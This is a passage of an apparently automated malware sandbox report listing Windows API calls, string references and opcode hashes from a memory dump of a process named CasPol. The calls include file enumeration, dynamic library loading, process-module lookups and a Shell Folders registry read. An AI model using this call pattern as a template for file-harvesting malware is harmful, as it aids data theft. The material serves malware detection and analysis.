                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2445788494-0
                                                                                                                                                              • Opcode ID: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                                                                                                              • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                                                                              • Opcode Fuzzy Hash: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                                                                                                              • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3150196962-0
                                                                                                                                                              • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                                                                                                              • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                                                                              • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                                                                                                              • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: malloc
                                                                                                                                                              • String ID: failed to allocate %u bytes of memory
                                                                                                                                                              • API String ID: 2803490479-1168259600
                                                                                                                                                              • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                                                              • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                                                                                                              • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                                                              • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 0041BDDF
                                                                                                                                                              • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcmpmemset
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1065087418-0
                                                                                                                                                              • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                                              • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                                                                              • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                                              • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                                                                                                                • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                                                                              • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                                                                                              • CloseHandle.KERNELBASE(?), ref: 00410654
                                                                                                                                                                • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                                                                                                • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                                                                                • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1381354015-0
                                                                                                                                                              • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                                                              • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                                                                              • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                                                              • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: free
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1294909896-0
                                                                                                                                                              • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                                                              • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                                                                                              • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                                                              • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                                                                • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                              • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2154303073-0
                                                                                                                                                              • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                              • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                                                                              • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                              • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3150196962-0
                                                                                                                                                              • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                                                                                              • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                                                                                              • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                                                                                              • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                                                                                              APIs
                                                                                                                                                              • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$PointerRead
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3154509469-0
                                                                                                                                                              • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                              • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                                                                              • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                              • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                                                                              APIs
                                                                                                                                                              • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                                                                • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                                                                • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                                                                • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4232544981-0
                                                                                                                                                              • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                              • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                                                                              • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                              • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                                                                              APIs
                                                                                                                                                              • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3664257935-0
                                                                                                                                                              • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                              • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                                                                              • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                              • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                              • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressProc$FileModuleName
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3859505661-0
                                                                                                                                                              • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                              • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                                                                              • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                              • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                                                                              APIs
                                                                                                                                                              • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileRead
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2738559852-0
                                                                                                                                                              • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                              • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                                                                              • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                              • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                                                                              APIs
                                                                                                                                                              • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileWrite
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3934441357-0
                                                                                                                                                              • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                              • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                                                                              • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                              • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                                                                              APIs
                                                                                                                                                              • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3664257935-0
                                                                                                                                                              • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                              • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                                                                              • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                              • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                                                                              APIs
                                                                                                                                                              • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                              • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                              • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                                                                              • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                              • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                                                                              APIs
                                                                                                                                                              • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                              • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                              • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                                                                              • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                              • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                                                                              APIs
                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ??3@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 613200358-0
                                                                                                                                                              • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                              • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                                                                              • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                              • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                                                                              APIs
                                                                                                                                                              • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3664257935-0
                                                                                                                                                              • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                              • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                                                                              • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                              • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                                                                              APIs
                                                                                                                                                              • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: EnumNamesResource
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3334572018-0
                                                                                                                                                              • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                              • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                                                                              • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                              • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                                                                              APIs
                                                                                                                                                              • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3664257935-0
                                                                                                                                                              • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                              • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                                                                              • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                              • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                                                                              APIs
                                                                                                                                                              • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseFind
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1863332320-0
                                                                                                                                                              • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                              • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                                                                              • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                              • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                                                                              APIs
                                                                                                                                                              • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Open
